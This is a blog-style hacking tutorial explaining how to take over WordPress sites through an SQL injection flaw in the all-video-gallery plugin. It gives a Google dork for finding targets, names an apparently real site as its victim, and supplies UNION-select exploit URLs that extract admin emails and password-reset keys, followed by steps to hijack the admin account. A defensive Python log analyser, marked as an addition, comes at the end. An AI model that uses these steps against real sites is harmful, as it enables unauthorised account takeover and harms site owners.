What is WordPress?
WordPress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL. It has many features, including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003, by founders Matt Mullenweg.
Now let's move on to hacking a website. I have used here the all-video-gallery (WordPress plugin) SQLi vulnerability.
1) First we will find a target using a Google dork:
inurl:all-video-gallery/config.php?vid=
2) Open any website. In my case it's juangrial.com.
3) Now let's do a SQL injection. Copy the exploit code, then hit Enter, then see the magic.
You can also try this. Well, both will work the same.
Exploit code for finding username & email:
http://site.com/wp-content/plugins/all-v…,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-
4) We got the admin email. Now let's reset it.
For that, go to http://Ursite.com/wp-admin or https://site.com/wp-login.php
(then click on Lost Password).
5) Enter the email we got in the earlier steps.
6) Now come back and go to the activation table.
Exploit code for activation key:
http://Ursite.com/wp-content/plugins/all-v…,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users–
7) We got what we need; now let's change the admin password.
Go to: http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8) Now open http://Ursite.com/wp-admin and log in with the new password.
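Seen from the site owner's side, the sequence above leaves a recognisable trail in the access log: a UNION-style query in the plugin's vid parameter, followed by password-reset requests to wp-login.php from the same client. The following is an added example, not part of the original post, that flags that chain; the log lines are constructed, and the combined log format and the lostpassword/resetpass action names (WordPress's standard login handler) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client IPs come from documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=3 HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2024:10:02:11 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=1+UNION+SELECT+1,2,3+FROM+wp_users-- HTTP/1.1" 200 734
203.0.113.9 - - [10/Mar/2024:10:03:40 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2024:10:04:05 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2210
198.51.100.7 - - [10/Mar/2024:10:05:00 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 1800
"""

# client IP, timestamp, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# SQL keywords that have no business inside a video id
SQLI = re.compile(r"\bunion\b.+\bselect\b|\bfrom\s+wp_users\b", re.I)
RESET_ACTIONS = {"lostpassword", "rp", "resetpass"}


def analyze(log_text):
    """Return {ip: {"sqli": [...], "reset": [...], "chained": bool}} for flagged clients."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, _method, target, _status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
        if url.path.endswith("/all-video-gallery/config.php"):
            vid = " ".join(params.get("vid", []))
            if SQLI.search(vid):
                hits.setdefault(ip, {"sqli": [], "reset": []})["sqli"].append(ts)
        elif url.path.endswith("/wp-login.php") and ip in hits:
            # Only reset traffic that FOLLOWS an injection attempt from the same client counts.
            action = params.get("action", [""])[0]
            if action in RESET_ACTIONS:
                hits[ip]["reset"].append((ts, action))
    for rec in hits.values():
        rec["chained"] = bool(rec["sqli"] and rec["reset"])
    return hits


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, "chained" if rec["chained"] else "sqli-only", rec)
```

A client flagged as chained warrants rotating the affected account's password and invalidating its pending reset key, in addition to removing or patching the plugin.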